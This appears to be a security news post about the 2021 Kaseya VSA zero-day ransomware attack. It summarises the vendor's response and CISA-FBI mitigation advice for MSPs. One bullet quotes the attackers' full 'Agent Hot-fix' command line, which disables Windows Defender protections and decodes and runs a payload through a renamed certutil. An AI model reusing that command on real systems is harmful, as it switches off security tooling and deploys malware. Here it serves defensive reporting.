Zero-Day Exploit Found in Kaseya VSA

On Friday, July 2, Kaseya, a Miami-based enterprise IT firm, was at the center of a sophisticated zero-day attack. The attack leveraged the company’s on-premises VSA product, a remote monitoring and management tool to reach Kaseya customers using the tool. This VSA product is supplied either as a hosted cloud service, or via on-premises VSA servers. Kaseya has clarified that the attack has only affected on-premises customers, however, as a precaution, the company has also shut down their cloud-based services. Since then, all customers using the VSA product have been urgently advised to shut down their VSA servers until further notice and asked to stay tuned for developing updates.

The company is currently working with the FBI, CISA, Mandiant (FireEye), and other cybersecurity forensics firms to conduct detailed investigations. On July 3, a Compromise Detection Tool was rolled out to approximately 900 Kaseya customers upon request as well as updates to its functionality. Kaseya notes that this tool analyzes a system (either VSA server or managed endpoint) to determine whether any indicators of compromise (IoC) are present.

• The “Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

The breach of Kaseya’s VSA product has affected their MSPs partners who, in turn, service small to medium-sized businesses globally. With the VSA breached, customers using the product are now subject to the ransomware as well.

In Kaseya’s official statement, they have recommended any customers using the VSA product to:

• Refrain from clicking links. Customers who have experienced ransomware and received communication from the attackers may be subjected to weaponized links.
• Report any suspicion of compromise as a result of the breach to [email protected] with the subject ‘Security Incident Report’ or to the FBI at https://www.IC3.gov.
• Continue to keep all on-premises VSA servers offline until further instructions from Kaseya about when it is safe to restore operations.
• Stay alert for an upcoming patch which will need to be installed prior to restarting the VSA. Refer to Kaseya’s Update Page to keep updated on the latest notices.

In the CISA-FBI report, they have recommended affected MSPs to:

• Enable and enforce multi-factor authentication (MFA) on every single account that is under the control of the organization, and to the maximum extent possible, enable and enforce MFA for customer-facing services.
• Implement allow listing to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and/or place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.
• Ensure backups are up to date and stored in an easily retrievable location that is air-gapped from the organizational network.
• Revert to a manual patch management process that follows vendor remediation guidance, including the installation of new patches as soon as they become available.
• Implement a principle of least privilege on key network resources admin accounts.

• Kaseya’s Compromise Detection Tool
• Kaseya’s Update Page
• Kaseya’s Official Statement
• CISA-FBI Guidance for MSPs and their Customers Affected by the Kaseya VSA Supply-Chain Ransomware Attack